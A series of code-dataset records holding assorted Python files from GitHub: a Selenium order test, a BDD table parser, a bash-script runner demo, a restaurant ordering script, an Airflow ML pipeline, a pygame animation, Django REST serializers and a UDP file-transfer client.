browser.find_element_by_id('FormField_6').send_keys(company)\n browser.find_element_by_id('FormField_7').send_keys(phone)\n browser.find_element_by_id('FormField_8').send_keys(street_add1)\n browser.find_element_by_id('FormField_9').send_keys(street_add2)\n browser.find_element_by_id('FormField_10').send_keys(city)\n self.select_dropdown_value(browser, 'FormField_11', country)\n self.select_dropdown_value(browser, 'FormField_12', state)\n self.clear_field(browser,'FormField_13')\n browser.find_element_by_id('FormField_13').send_keys(postcode)\n browser.find_element_by_xpath('//button[text() = \"Next\"]').click()\n #Add an Item\n self.cp_add_order_item(browser,'[Sample] Anna, bright single bangles')\n # Select Shipping address and Payment method\n self.cp_select_shipping_payment(browser, 'Manual Payment')\n\n # Verify and Assert the success message\n browser_success_msg = self.wait_until_element_present('.alert-success', 'CSS_SELECTOR').text\n order_success_msg=\"Order #%s has been created successfully.\" % browser_success_msg[7:10]\n orderID = self.get_order_number(browser)\n\n assert order_success_msg in browser_success_msg\n return orderID\n","repo_name":"testing-sravan/tests-scripts-worked","sub_path":"Regression_suite_bigc/lib/order_class.py","file_name":"order_class.py","file_ext":"py","file_size_in_byte":8725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"75139715881","text":"from parse import compile\r\n\r\n\r\nclass StepTable:\r\n \"\"\"Step table parser utility class\"\"\"\r\n KEY_TEXT = 'key'\r\n EMPTY_TEXT = ''\r\n VALUE_TEXT = 'value'\r\n NESTED_KEY_TEXT = 'nested_key'\r\n EMPTY_DOUBLE_QUOTES = '\"\"'\r\n NEW_LINE_CHARACTER = '\\n'\r\n LESS_THAN_CHARACTER = '<'\r\n GREATER_THAN_CHARACTER = '>'\r\n key_value_schema = compile('|{key:^w}|{value:^}|')\r\n 
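# Hypothetical sanity check for the schema above (example values invented here, not from the source):\r\n # key_value_schema.parse('|host|127.0.0.1|').named == {'key': 'host', 'value': '127.0.0.1'}\r\n 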
nested_key_value_schema = compile('|{key:^w}|{nested_key:^}|{value:^}|')\r\n\r\n @staticmethod\r\n def parse_step_table(step_table: str):\r\n \"\"\"Parse static step table\r\n\r\n Note:\r\n Empty key is not accepted, will raise Exception\r\n Key value mapping with empty value will be ignored\r\n \"\"\"\r\n table_dict = {}\r\n for line in step_table.split(StepTable.NEW_LINE_CHARACTER):\r\n if line == StepTable.EMPTY_TEXT:\r\n break\r\n result = StepTable.key_value_schema.parse(line)\r\n if result is None:\r\n raise Exception('Step Error: Unable to parse step table')\r\n else:\r\n if result.named[StepTable.VALUE_TEXT].strip() == StepTable.EMPTY_TEXT:\r\n continue\r\n table_dict.update({\r\n result.named.get(StepTable.KEY_TEXT): result.named.get(StepTable.VALUE_TEXT)\r\n })\r\n return table_dict\r\n\r\n @staticmethod\r\n def parse_nested_key_step_table(step_table: str):\r\n \"\"\"Parse static nested step table\r\n\r\n Note:\r\n Empty key is not accepted, will raise Exception\r\n If empty value, simple or nested key value be ignored\r\n \"\"\"\r\n table_dict = {}\r\n for line in step_table.split(StepTable.NEW_LINE_CHARACTER):\r\n result = StepTable.nested_key_value_schema.parse(line)\r\n if result is None:\r\n raise Exception('Step Error: Unable to parse nested step table')\r\n else:\r\n if result.named[StepTable.VALUE_TEXT].strip() == StepTable.EMPTY_TEXT:\r\n continue\r\n elif result.named[StepTable.NESTED_KEY_TEXT].strip() == StepTable.EMPTY_TEXT:\r\n table_dict.update({\r\n result.named.get(StepTable.KEY_TEXT): result.named.get(StepTable.VALUE_TEXT)\r\n })\r\n else:\r\n table_dict.update({\r\n result.named.get(StepTable.KEY_TEXT):\r\n {result.named.get(StepTable.NESTED_KEY_TEXT): result.named.get(StepTable.VALUE_TEXT)}\r\n })\r\n return table_dict\r\n\r\n @staticmethod\r\n def parse_step_table_example_value(request, table_dict):\r\n \"\"\"Parse step table example value\"\"\"\r\n return {key: StepTable.get_value(request, value) for key, value in table_dict.items()}\r\n\r\n @staticmethod\r\n def get_value(request, argument):\r\n \"\"\"Get fixture value from BDD examples\"\"\"\r\n if argument[0] == StepTable.LESS_THAN_CHARACTER and argument[-1] == StepTable.GREATER_THAN_CHARACTER:\r\n value = request.getfixturevalue(argument[1:-1])\r\n return None if value == StepTable.EMPTY_TEXT else value\r\n return None if argument == StepTable.EMPTY_DOUBLE_QUOTES else argument\r\n","repo_name":"kr87nikhil/python-bdd","sub_path":"utility/parse_steps.py","file_name":"parse_steps.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36982475426","text":"\"\"\"Script to test execution of bash scripts, gathering\n the results, combining them and saving them.\n\n\t @author 'Pat Barton'\t \n\"\"\"\n\n\n\n\"\"\"This demo is simple, but shows all the key steps required to integrate\n existing bash scripts with you python codes.\n\n Exactly what the bash scripts do is not important so we'll \n spin up some trivial ones. We'll just make some up. For\n\t demo purposes all will do the same thing - return the names\n\t of files (ls/dir command) - from their directories.\n\n We'll create different directories for each of three bash scripts\n and populate the directories with files named so we know where\n\t they camre from.\n\n\tAll this happens in setup_scratch_dirs() - not that all this functionality\n\t is isolated from the rest of the code. 
That way it'll be easy to substitute\n\t \"real\" bash scripts from your own directories. Note the use of \n\t tempfile.mkdtemp() - this writes a scratch directory somewhere safe. Note\n\t also that we're exercising good manners by cleaning up the mess using\n\t shutil.rmtree.\n\n\t=======\n\tThe bash files will go out into the world and do something. All this functionality\n\t is handled in run_scripts(). Note, again, the isolated functionality - this makes things\n\t easy to maintain. We run the scripts and capture their output with the \n\t subprocess.check_output() method.\n\n\t===\n\tAt the end of the day we want to do something with the output. That's all handled in\n\t the process_output() function. Naturally, you'll want to \"roll your own\" here, but you \n\t know where to put it.\n\n\t===\n\tThe global namespace of the module is uncluttered. The bit at the top wrangles the \n\t imports and makes sure we remember the original directory. The bit at the bottom\n\t cleans things up and ensures that we leave the working directory right where we found it.\n\"\"\"\n\nimport tempfile\nimport os\nimport shutil\nimport subprocess\n\nNUM_SCRIPTS = 3\n\n#make a temp dir and switch into it.\norig_dir = os.getcwd() #remember original dir\ntemp_dir = tempfile.mkdtemp() #returns name of new dir\nos.chdir(temp_dir) #switch to temp dir\n\ndef setup_scratch_dirs():\n \"\"\"This routine makes subdirectories in scratch folder. Each\n gets populated with a few empty files and its own bash script.\n So it'll look like:\n scratch\\\n subdir0\\\n \t subdir0_file0\n \t\t subdir0_file1\n \t\t subdir0_file2\n \t\t script0.sh\n \tThe script file just contains the command 'ls' and will list the\n \tfiles in its subdir (makes output easy to check)\n\n \tA list of the script files is returned.\n \"\"\"\t\t \n scrip_paths=[]\n for s in range(NUM_SCRIPTS):\n subname = \"subdir\" + str(s)\n sub = os.mkdir(subname) #make sudirs named 'subdir0', etc.\n os.chdir(subname) #switch to subdir\n for f in range(5): \n filename = \"subdir\" + str(s) + \"_file\" + str(f)\n open(filename, 'w').close()\n\n #create a script file and a file handler\n scriptname = 'script' + str(s) + \".sh\"\n scrip_paths.append(os.path.join(os.getcwd(), scriptname))\n with open(scriptname, 'w') as script:\n script.write(\"#! /bin/bash\\n\")\n script.write(\"ls\\n\") #lists contents of the director\n\n os.chmod(scriptname, 0o777) #let anyone do anything with the script\n\n os.chdir('..') #switch to scratch dir\n\n return scrip_paths\n\ndef run_scripts(scripts):\n \"\"\"Expects an iterable object (list, tuple, etc.) containing\n fully-specified path to script file. Runs each script, \n captures the output, and does something with the output.\n\n The subprocess module has tons of options. You can read\n all about them here:\n\n https://docs.python.org/3/library/subprocess.html\n\n Output is stored in a list, one element for each script,\n and returned.\n\n \"\"\"\n output_list=[]\n for index, s in enumerate(scripts):\n #split path name from script name\n sdir, sname = os.path.split(s) \n #run the script using its dir as the cwd, capture output\n os.chdir(sdir)\n output = subprocess.check_output(s)\n output_list.append(output)\n return output_list\n\n\n\ndef process_output(output):\n \"\"\"Does something with the output, which enters this function\n as a list. 
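(Each element is the raw bytes object returned by subprocess.check_output, so decode it first if you need str.) 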
Do anything you want here, I'm just having fun\"\"\"\n\n for i in range(len(output)):\n # this makes a list from the return of an ls on linux\n output[i] = output[i].split()\n\n stg = \"{} HealthCheckPassed \\n\\t{} INROTATION \\n\\t{} STATUSCODE\"\t\n for result0, result1, result2 in zip(output[0], output[1], output[2]):\n print(stg.format(result0, result1, result2))\n\n\nscripts = setup_scratch_dirs()\t\noutput = run_scripts(scripts)\nprocess_output(output)\n\nos.chdir(orig_dir)\nshutil.rmtree(temp_dir)\t\n\n\n","repo_name":"pbarton666/learninglab","sub_path":"experimental/py_run_bash_scripts.py","file_name":"py_run_bash_scripts.py","file_ext":"py","file_size_in_byte":4871,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"}
+{"seq_id":"73432611881","text":"# 点菜小程序\nmenu_list = [ \"糖醋排骨\",\"水煮鱼\",\"大盘鸡\",\"拌黄瓜\",\"萝卜炒肉\",\"土豆丝\"] # 菜品目录\nprice = [48, 58,38, 12 , 45 ,15 ] # 菜品价格\norder_price = 0 # 菜品单价\norder_list = [] # 已点菜品\ncount = 0 # 计算总价\nk = 0 # 餐品数目\nn = 0\nseat_list = [2,2,2,4,4,4,6,6,6] # 每桌的座位数\nsitdown_list = [] # 存放已经被坐了的座位号\nguest_list =[] # 存放就餐人数量\nprint(\"**************欢迎光临大连工业大学小菜馆**************\")\nx = int(input(\"请问您几位: \"))\nguest_list.append(x)\nfor y in seat_list:\n n += 1\n if y >= x:\n sitdown_list.append(seat_list.index(y))\n seat_list.remove(y)\n print(\"您的座位是{}号桌\".format(sitdown_list))\n break\nif n != seat_list.index(y) + 1:\n print(\"对不起,本餐厅没有合适的座位。\")\nelse:\n print(\"请您参考下列菜单菜品价格进行点菜\")\n print(\"Python 365 菜品\\n\",menu_list)\n print(\"Python 365 菜单价格\\n\",price)\n print(\"***************如完成点菜请输入N,如需要取消已点菜品请输入C***************\")\n server = input('请输入菜品进行点餐: ')\n def order_1(menu_list, order_list,server1):\n order_list.append(server1)\n print('已经点购菜名:{}'.format(order_list))\n a = menu_list.index(server1)\n return(a)\n while ( server != 'N'):\n if (server != 'C'):\n k+=1\n order_price = order_1(menu_list, order_list, server)\n print(\"***************如完成点菜请输入N,如需要取消已点菜品请输入C***************\")\n server = input('请输入菜品进行点餐: ')\n count += price[order_price]\n else:\n if (k==0):\n print(\"!!!您还未点任何菜品!!!\")\n server = input('请输入菜品进行点餐: ')\n else:\n cancle = input('请输入要取消的菜品: ')\n b = menu_list.index(cancle)\n order_list.remove(cancle)\n count -= price[b]\n k -=1\n print(\"***************如完成点菜请输入N,如需要取消已点菜品请输入C***************\")\n server = input('请输入菜品进行点餐: ')\n print(\"一共点了{0}道菜品,共计{1}元\".format(k,count))\n while True:\n fee = float(input(\"您支付的金额是:\"))\n if float(fee) < float(count):\n print(\"***************您支付的金额不足***************\")\n continue\n else:\n print(\"您支付了{}元,找您{}元\".format(count, fee - count))\n break","repo_name":"Bryson582/Python_365","sub_path":"ordermeal.py","file_name":"ordermeal.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"933276943","text":"import numpy as np\nimport cv2\n\nimage = cv2.imread(\"images/dog.jpg\", cv2.IMREAD_GRAYSCALE)\nif image is None:\n raise Exception(\"영상파일 읽기 오류\")\n\n\n# LoG 연산\ngaus = cv2.GaussianBlur(image, (7, 7), 0, 0) # 가우스마스크 적용\ndst1 = cv2.Laplacian(gaus, cv2.CV_16S, 7) # 라플라시안 수행\n\n# DoG 연산\ngaus1 = cv2.GaussianBlur(image, (3, 3), 0)\ngaus2 = cv2.GaussianBlur(image, (9, 9), 0)\ndst2 = gaus1 - gaus2\n\ncv2.imshow(\"image\", image)\ncv2.imshow(\"dst2- DoG\", 
dst2)\ncv2.waitKey(0)\n","repo_name":"yujongyeop/image-processing","sub_path":"week07/edge_DOG.py","file_name":"edge_DOG.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"31916048729","text":"# 九章的python代码,这里体现了python中栈操作的便利性。\n# http://www.jiuzhang.com/solutions/binary-tree-zigzag-level-order-traversal/\nfrom lintcode import TreeNode\n\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n this.val = val\n this.left, this.right = None, None\n\"\"\"\n\n\nclass Solution:\n \"\"\"\n @param root: The root of binary tree.\n @return: A list of list of integer include \n the zig zag level order traversal of its nodes' values\n \"\"\"\n def preorder(self, root, level, res):\n if root:\n if len(res) < level+1: res.append([])\n if level % 2 == 0: \n res[level].append(root.val)\n else: \n res[level].insert(0, root.val)\n self.preorder(root.left, level+1, res)\n self.preorder(root.right, level+1, res)\n def zigzagLevelOrder(self, root):\n self.results = []\n self.preorder(root, 0, self.results)\n return self.results","repo_name":"XingxingHuang/Leetcode-for-Fun","sub_path":"lintcode/lintcode_071_Binary_tree_Zigzag_Level_Order_Traversal.py","file_name":"lintcode_071_Binary_tree_Zigzag_Level_Order_Traversal.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"18"} +{"seq_id":"86642291565","text":"import pandas as pd\nimport numpy as np\nimport pickle\nfrom datetime import datetime\nfrom airflow import DAG\nfrom airflow.operators.bash import BashOperator\nfrom airflow.operators.python import PythonOperator\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVC\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import f1_score\n\n\ndef _prepare_dataset():\n dataset = pd.read_csv('~/airflow-docker/downloads/dataset_diabetes/diabetic_data.csv')\n dataset = dataset.drop(['encounter_id', 'patient_nbr'], axis=1)\n dataset = dataset.replace(to_replace='?', value=np.NaN)\n dataset = dataset.dropna(axis=1)\n dataset = _labels_to_numbers(dataset, 'readmitted')\n dataset = pd.get_dummies(dataset, drop_first=True)\n dataset = _balance_dataset(dataset, 'readmitted')\n dataset.to_csv('~/airflow-docker/downloads/clean_dataset.csv', index=False)\n\ndef _labels_to_numbers(dataset, column):\n labels = dataset[column].unique()\n num_labels = len(labels)\n label_dict = dict(zip(labels, range(0, num_labels)))\n numerical_labels = dataset[column].map(label_dict)\n return dataset.assign(**{column: numerical_labels})\n\ndef _balance_dataset(dataset, target_column):\n value_counts = dataset[target_column].value_counts()\n min_count = min(value_counts)\n return dataset.groupby(target_column).sample(n=min_count, random_state=42)\n\ndef _get_model_score(filepath, target_column, model):\n X, y = _split_dataset(filepath, target_column)\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=42)\n model.fit(X_train, y_train)\n y_pred = model.predict(X_test)\n return f1_score(y_test, y_pred, average='macro')\n\ndef _split_dataset(filepath, target_column):\n dataset = pd.read_csv(filepath)\n X = dataset.drop(target_column, axis=1)\n y = dataset[target_column]\n return X, y\n\ndef _train_best_model(ti, filepath, target_column):\n scores = ti.xcom_pull(task_ids=[\n 'get_svc_score',\n 
'get_knn_score',\n 'get_rfc_score'\n ])\n\n model, model_name = _select_best_model(scores)\n X, y = _split_dataset(filepath, target_column)\n model.fit(X, y)\n with open(f'/home/joshua/airflow-docker/downloads/{model_name}_model.pk', 'wb') as f:\n pickle.dump(model, f)\n \n return max(scores)\n\ndef _select_best_model(scores):\n best_model = np.argmax(np.array(scores))\n if best_model == 0:\n return SVC(), 'svc'\n elif best_model == 1:\n return KNeighborsClassifier(), 'knn'\n else:\n return RandomForestClassifier(), 'rfc'\n\n\nwith DAG(\n dag_id='ml_pipeline',\n schedule_interval='@monthly',\n start_date=datetime(2022, 1, 1),\n catchup=False\n) as dag:\n\n download_dataset = BashOperator(\n task_id='download_dataset',\n bash_command='curl -o ~/airflow-docker/downloads/dataset_diabetes.zip https://archive.ics.uci.edu/ml/machine-learning-databases/00296/dataset_diabetes.zip'\n )\n\n unzip_dataset = BashOperator(\n task_id='unzip_dataset',\n bash_command='unzip ~/airflow-docker/downloads/dataset_diabetes.zip -d ~/airflow-docker/downloads/'\n )\n\n prepare_dataset = PythonOperator(\n task_id='prepare_dataset',\n python_callable=_prepare_dataset\n )\n\n get_svc_score = PythonOperator(\n task_id='get_svc_score',\n python_callable=_get_model_score,\n op_kwargs={\n 'filepath': '~/airflow-docker/downloads/clean_dataset.csv', \n 'target_column': 'readmitted', \n 'model': SVC()}\n )\n\n get_knn_score = PythonOperator(\n task_id='get_knn_score',\n python_callable=_get_model_score,\n op_kwargs={\n 'filepath': '~/airflow-docker/downloads/clean_dataset.csv', \n 'target_column': 'readmitted', \n 'model': KNeighborsClassifier()}\n )\n\n get_rfc_score = PythonOperator(\n task_id='get_rfc_score',\n python_callable=_get_model_score,\n op_kwargs={\n 'filepath': '~/airflow-docker/downloads/clean_dataset.csv', \n 'target_column': 'readmitted', \n 'model': RandomForestClassifier()}\n )\n\n train_best_model = PythonOperator(\n task_id='train_best_model',\n python_callable=_train_best_model,\n op_kwargs={\n 'filepath': '~/airflow-docker/downloads/clean_dataset.csv', \n 'target_column': 'readmitted'\n }\n )\n\n download_dataset >> unzip_dataset >> prepare_dataset >> [get_svc_score, get_knn_score, get_rfc_score] >> train_best_model\n ","repo_name":"chiny-jc/airflow-workflows","sub_path":"ml_pipeline.py","file_name":"ml_pipeline.py","file_ext":"py","file_size_in_byte":4613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"10535767251","text":"################\n# Approach animation with a blob image (comment translated from Hungarian)\n\nimport random\nimport pygame as pg\nimport numpy as np\n\nrandom.seed()\n\nWIDTH, HEIGHT = 1550, 800\nRADIUS = 20 # ball radius; also used as the margin of the yellow field\n\nWIN = pg.display.set_mode((WIDTH, HEIGHT))\n\nBACKGROUND = (128, 220, 12)\n\nFPS = 50\n\n# rotation step applied to the velocity vector while circling the target\nALPHA = np.pi / 20\nSI, CO = np.sin(ALPHA), np.cos(ALPHA)\n\n\ndef update(x, y, u, v, x1, y1, phase):\n # phase 1: fly straight towards the target; phase 2: circle around it\n if phase == 1:\n diff = (x1 - x, y1 - y)\n if np.sqrt(diff[0] ** 2 + diff[1] ** 2) > 30:\n x += u\n y += v\n else:\n phase = 2\n u, v = v, -u # turn 90 degrees to start circling\n if phase == 2:\n x += u\n y += v\n u, v = CO * u - SI * v, SI * u + CO * v # rotate the velocity vector\n return x, y, u, v, phase\n\ndef draw_window(x, y, u, v, x1, y1, phase):\n WIN.fill(BACKGROUND)\n x, y, u, v, phase = update(x, y, u, v, x1, y1, phase)\n pg.draw.rect(WIN, (255, 255, 0), ((RADIUS, RADIUS), (WIDTH - 2 * RADIUS, HEIGHT - 2 * RADIUS)), width=0)\n pg.draw.circle(WIN, (0, 0, 0), (x, y), width=0, radius=RADIUS)\n pg.draw.circle(WIN, (0, 0, 255), (x1, y1), width=0, radius=RADIUS)\n pg.display.update()\n return x, y, u, v, phase\n\n\ndef main():\n clock = pg.time.Clock()\n run = True\n phase = 1\n x, y, x1, y1 = 0, HEIGHT / 2, WIDTH / 2, HEIGHT / 2\n diff = (x1 - x, y1 - y)\n f = np.sqrt(diff[0] ** 2 + diff[1] ** 2)\n u = 5 * diff[0] / f # initial speed: 5 px/frame towards the target\n v = 5 * diff[1] / f\n\n while run:\n clock.tick(FPS)\n for event in pg.event.get():\n if event.type == pg.QUIT:\n run = False\n x, y, u, v, phase = draw_window(x, y, u, v, x1, y1, phase)\n pg.quit()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"egyszem/emotion_through_motions","sub_path":"test6.py","file_name":"test6.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"24424431101","text":"# Actualizado por:\n# Yeimmy Katherin Lugo \n# 07/06/2023\n\n\nfrom rest_framework import serializers\nfrom .models import Devices, Project, Template, DatosSensores, SharedProject, graphics\n\n\n\n# class SharedProjectValidationSerializer(serializers.Serializer):\n# idrandom = serializers.CharField()\n\n# def validate_idrandom(self, value):\n# try:\n# project = Project.objects.get(idrandom=value)\n# except Project.DoesNotExist:\n# raise serializers.ValidationError(\"Invalid idrandom\")\n# return value\n\nclass SharedRelationSerializer(serializers.ModelSerializer):\n id = serializers.IntegerField(read_only=True) # Campo de solo lectura para el ID\n\n class Meta:\n model = SharedProject\n fields = ['id', 'user', 'project', 'timestamp']\n # Define los campos que se serializarán/deserializarán y se incluirán en la representación del objeto\n\n \nclass ShareProjectSerializer(serializers.Serializer):\n idrandom = serializers.CharField(max_length=300) # Campo de cadena de caracteres con una longitud máxima de 300 caracteres\n # Define el campo \"idrandom\" que se serializará/deserializará\n\n \nclass ProjectSerializer(serializers.ModelSerializer):\n relationUserProject = serializers.ReadOnlyField(source='relationUserProject.username')\n # Define un campo de solo lectura \"relationUserProject\" que obtiene el nombre de usuario del campo \"relationUserProject\" del objeto relacionado\n\n class Meta:\n model = Project\n fields = ['id', 'idrandom', 'name', 'location', 'description', 'relationUserProject']\n # Define los campos que se serializarán/deserializarán y se incluirán en la representación del objeto\n read_only_fields = ['id']\n # Define los campos que serán de solo lectura en la deserialización (es decir, no se permitirá actualizarlos mediante la API)\n\n def create(self, validated_data):\n # Obtenemos el usuario autenticado de la solicitud\n user = self.context[\"request\"].user\n # Establecemos el valor de relationUserProject en el usuario autenticado\n validated_data[\"relationUserProject\"] = user\n # Creamos el objeto Project usando los datos validados actualizados\n project = Project.objects.create(**validated_data)\n return project\n\nclass DevicesSerializer(serializers.ModelSerializer):\n relationProject = serializers.PrimaryKeyRelatedField(queryset=Project.objects.all(), default=serializers.CurrentUserDefault())\n # Utilizamos el campo PrimaryKeyRelatedField para obtener el ID del proyecto en lugar del nombre\n class Meta:\n model = Devices\n # Asocia el serializador al modelo \"Devices\"\n fields = [\n \"id\", # Campo de identificación del dispositivo\n \"name\", # Campo de nombre del dispositivo\n \"location\",# Campo de ubicación del dispositivo\n \"template\",\n 
\"relationProject\", # Campo de relación con el usuario propietario del dispositivo\n ]\n read_only_fields = ['id']\n # Define los campos que serán de solo lectura en la deserialización (es decir, no se permitirá actualizarlos mediante la API)\n\n \n def create(self, validated_data):\n project_id = self.context['request'].parser_context['kwargs']['project_id']\n project = Project.objects.get(id=project_id)\n validated_data.pop('relationProject')\n device = Devices.objects.create(relationProject=project, **validated_data)\n return device\n \n \nclass TemplateSerializer(serializers.ModelSerializer):\n relationUserTemplate = serializers.ReadOnlyField(source='relationUserTemplate.username')\n # Define un campo de solo lectura \"relationUserTemplate\" que obtiene el nombre de usuario del campo \"relationUserTemplate\" del objeto relacionado\n\n class Meta:\n model = Template\n # Asocia el serializador al modelo \"Template\"\n fields = [\n \"id\", # Campo de identificación de la plantilla\n \"name\", # Campo de nombre de la plantilla\n \"sensor\", # Campo de sensor asociado a la plantilla\n \"red\", # Campo de red asociada a la plantilla\n \"descripcion\", # Campo de descripción de la plantilla\n \"relationUserTemplate\", # Campo de relación con el usuario propietario de la plantilla\n ]\n read_only_fields = ['id']\n # Define los campos que serán de solo lectura en la deserialización (es decir, no se permitirá actualizarlos mediante la API)\n\n def create(self, validated_data):\n # Obtenemos el usuario autenticado de la solicitud\n user = self.context[\"request\"].user\n # Establecemos el valor de relationUserDevice en el usuario autenticado\n validated_data[\"relationUserTemplate\"] = user\n # Creamos el objeto relationUserDevice usando los datos validados actualizados\n template = Template.objects.create(**validated_data)\n return template\n \nclass TemplateSerializerShared(serializers.ModelSerializer):\n relationUserTemplate = serializers.ReadOnlyField(source='relationUserTemplate.username')\n # Define un campo de solo lectura \"relationUserTemplate\" que obtiene el nombre de usuario del campo \"relationUserTemplate\" del objeto relacionado\n class Meta:\n model = Template\n # Asocia el serializador al modelo \"Template\"\n fields = [\n \"id\", # Campo de identificación de la plantilla\n \"name\", # Campo de nombre de la plantilla\n \"sensor\", # Campo de sensor asociado a la plantilla\n \"red\", # Campo de red asociada a la plantilla\n \"descripcion\", # Campo de descripción de la plantilla\n \"relationUserTemplate\", # Campo de relación con el usuario propietario de la plantilla\n ]\n read_only_fields = ['id']\n # Define los campos que serán de solo lectura en la deserialización (es decir, no se permitirá actualizarlos mediante la API)\n\n\n \n \n \nclass DatosSensoresSerializer(serializers.ModelSerializer):\n relationTemplatePin = serializers.PrimaryKeyRelatedField(read_only=True)\n\n class Meta:\n model = DatosSensores\n fields = ['name', 'created_at', 'v1', 'v2', 'v3', 'v4', 'v5', 'v6', 'v7', 'v8', 'v9', 'v10', 'v11', 'v12', 'relationTemplatePin']\n read_only_fields = ['name', 'created_at', 'v1', 'v2', 'v3', 'v4', 'v5', 'v6', 'v7', 'v8', 'v9', 'v10', 'v11', 'v12', 'relationTemplatePin']\n \n def create(self, validated_data):\n template_id = self.context['request'].parser_context['kwargs']['id']\n template = Template.objects.get(id=template_id)\n validated_data.pop('relationTemplatePin') # Eliminar la clave 'relationTemplateGraphics'\n sensores = 
DatosSensores.objects.create(relationTemplatePin=template, **validated_data)\n return sensores\n\nclass GraphicsSerializer(serializers.ModelSerializer):\n relationTemplateGraphics = serializers.PrimaryKeyRelatedField(queryset=Template.objects.all(), default=serializers.CurrentUserDefault())\n\n class Meta:\n model = graphics\n fields = [\n \"id\",\n \"titlegraphics\",\n \"namegraphics\",\n \"aliasgraphics\",\n \"location\",\n \"is_circular\",\n \"color\",\n \"ports\",\n \"size_increase\", \n \"size_decrease\",\n \"relationTemplateGraphics\",\n ]\n read_only_fields = ['id']\n\n def create(self, validated_data):\n template_id = self.context['request'].parser_context['kwargs']['id']\n template = Template.objects.get(id=template_id)\n validated_data.pop('relationTemplateGraphics') # Eliminar la clave 'relationTemplateGraphics'\n graphicsx = graphics.objects.create(relationTemplateGraphics=template, **validated_data)\n return graphicsx\n\n\n","repo_name":"PIANTAIOT/Pianta---IOT---Backend-","sub_path":"Pianta/Project_Api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":7900,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6402881010","text":"import socket\nimport os\nimport sys\n\n\n#function that asks the user for what it wants to do and returns an integer.\n#It returns the command if a valid command if a valid command has been\n#requested, otherwise it returns 0.\ndef inputReceiver():\n print(\"1) get the list of file in the server\")\n print(\"2) get the contents of a file from the server\")\n print(\"3) upload a file on the server\")\n print(\"4) exit\")\n command = input(\"Input a valid command[1/2/3/4]: \")\n if(command.isnumeric()):\n command = int(command)\n if command == 1 or command == 2 or command == 3 or command == 4:\n return command\n else:\n return 0\n else :\n return 0\n\n\n#initialize socket\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n#set server address\nserver_address = (\"localhost\", 12000)\n\n#starting main continious loop, which controlls the UPD communications with the server\nwhile True:\n\n #waitingForCommand will be used to ask the user for a valid command until one is entered\n waitingForCommand = True\n\n #while loop askd for user to input a valid command until it is entered\n while waitingForCommand:\n commandRequested = int(inputReceiver())\n \n if commandRequested != 0:\n print(\"command accepted\")\n waitingForCommand = False\n else :\n print(\"command not acceptable\")\n\n #incapsulating in a try to catch any exeptions\n try:\n \n if commandRequested == 1:\n\n #sending the request of the list message to the server\n message = \"get list\"\n sock.sendto(message.encode(), server_address)\n\n #receiving the list from the server. 
the first word is the number of files in the list, then the filenames are listed\n data, server = sock.recvfrom(4096)\n data = data.decode()\n\n #checking if the server sent a valid answer\n if data.isdigit():\n\n #printing the number of files\n print(\"there are \" + str(data) + \" files on the server\")\n\n #waiting for server to send the list of files\n data, server = sock.recvfrom(4096)\n data = data.decode()\n\n #printing the filenames\n print(str(data))\n\n #printing the error message of the server, if the awnswer wasn't valid\n else:\n print(\"an error has occured on the server.\")\n print(data)\n\n elif commandRequested == 2:\n\n #requesting the filename of the file the user wants to download\n fileName = input(\"input the name of the file you want to download: \")\n\n #sending the request of the file to the server\n message = \"get file\"\n sock.sendto(message.encode(), server_address)\n sock.sendto(fileName.encode(), server_address)\n\n #receiving the request flag\n #if the flag is 0 then the file has been found\n data, server = sock.recvfrom(4096)\n data = data.decode()\n \n if data == \"0\":\n\n #downloading the file on the client\n print(\"file found on the server\\ndownloading the file...\")\n\n #receiving the file contents from the server\n data, server = sock.recvfrom(4096)\n data = data.decode()\n #creating a new file with as name the fileName and writing the contents\n fileFolder = os.path.join(os.getcwd(),\"client_files\")\n filePath = os.path.join(fileFolder,fileName)\n newFile = open(filePath, \"w\")\n newFile.write(data)\n print(\"file downloaded\")\n\n #if the flag is 1 then the file has not been found\n elif data == \"1\":\n print(\"the file has not been found on the server\")\n\n else:\n print(\"an error has occured on the server.\")\n print(data)\n\n \n elif commandRequested == 3:\n\n #requesting the filename of the file the user wants to upload\n fileName = input(\"input the name of the file you want to upload: \")\n\n #reading the file\n fileFolder = os.path.join(os.getcwd(), \"client_files\")\n filePath = os.path.join(fileFolder, fileName)\n file = open(filePath, \"r+\")\n data = file.read()\n\n #sending the request, filename and file contents to the server\n message = \"upload\"\n sock.sendto(message.encode(), server_address)\n sock.sendto(fileName.encode(), server_address)\n sock.sendto(data.encode(), server_address)\n file.close()\n\n print(\"sending \" + fileName + \" to the server...\")\n\n #waiting for the server to awnser, telling the client the file has been uploaded\n data, server = sock.recvfrom(4096)\n data = data.decode()\n\n #if the request flag is == \"0\" the file has been correctly uploaded\n if data == \"0\":\n print(fileName + \" uploaded correctly to the server\")\n else:\n print(\"an error has occured on the server.\")\n print(data)\n\n \n #closing the client program\n elif commandRequested == 4:\n sock.close()\n sys.exit()\n\n except Exception as e:\n print(e)\n \n 